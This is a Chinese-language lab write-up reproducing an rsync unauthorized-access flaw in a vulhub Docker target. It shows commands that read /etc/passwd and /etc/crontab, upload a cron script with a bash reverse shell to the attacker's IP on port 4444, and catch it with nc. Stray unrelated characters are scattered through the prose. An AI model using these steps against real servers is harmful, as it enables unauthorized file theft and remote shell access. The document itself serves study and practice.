0x00 前言
最近幾天遇到了一些rsync未授權(quán)訪問的漏洞,然后自己也不是很熟悉叛本,正好vulhub靶場里面有,而且最后會有反彈shell的內(nèi)容我也沒太熟悉,所以感覺是個很好的機會可以一并學習在塔。嗯嗯我可以!(我真的是太菜了呀)
0x01 環(huán)境
起docker拨黔。切進目錄cd vulhub/rsync/common
然后起服務(wù)蛔溃。
sudo docker-compose build
sudo docker-compose up -d
我之前起過,然后再起的時候遇到了run之后直接自己關(guān)掉的情況篱蝇,就關(guān)掉重新開了贺待,關(guān)掉的命令應(yīng)該是sudo docker-compose down。
靶機ip:10.222.100.117 MAC
攻擊機ip:10.211.55.3 kali
0x02 復(fù)現(xiàn)
環(huán)境啟動后,開始在kali上邊操作态兴,首先用rsync命令訪問一哈:
rsync rsync://your-ip:873/
rsync訪問.png
真不錯狠持,看到有兩個模塊,那我們先看看src里面有什么
rsync rsync://10.222.100.117:873/src
圖片.png
看起來東西不少瞻润,而且像是一個Linux根目錄喘垂,那我們看看能不能把etc/passwd下載下來。
rsync -av rsync://10.222.100.117:873/src/etc/passwd 1.txt
這個命令是把etc/passwd里的內(nèi)容下載到我當前目錄的 1.txt里面了绍撞,看看內(nèi)容
圖片.png
看到已經(jīng)下載下來了正勒,那我們上傳一個shell把它放在一個定時任務(wù)里面,然后nc等到反彈shell就可以成功了傻铣。
接下來章贞,切到定時任務(wù)的目錄下,把它的配置文件下載下來非洲。
rsync -av rsync://10.222.100.117:873/src/etc/crontab crontab.txt
圖片.png
看看內(nèi)容鸭限,這句話的意思是蜕径,每17分鐘執(zhí)行一次/etc/cron.hourly這個命令
圖片.png
寫入shell任意文件 vim寫就可以
#!/bin/bash
/bin/bash -i >& /dev/tcp/10.211.55.3/4444 0>&1
寫完是這樣的
圖片.png
然后把shell上傳
圖片.png
然后nc監(jiān)聽端口
nc -nvv -lp 4444每小時第17分鐘執(zhí)行,反彈shell成功败京。
圖片.png
當然也可以兜喻,修改定時的時間,比如改成在2分的時候執(zhí)行赡麦。
這個需要在靶機上
docker ps
sudo docker exec -it 4ff06ed20a8b -bash
圖片.png
然后vim更改,應(yīng)該需要安裝vim的
命令是
apt-get update
apt-get install vim
vim crontab
把時間改成你想要的時間
然后等待時間的到來, 反彈shell成功朴皆。
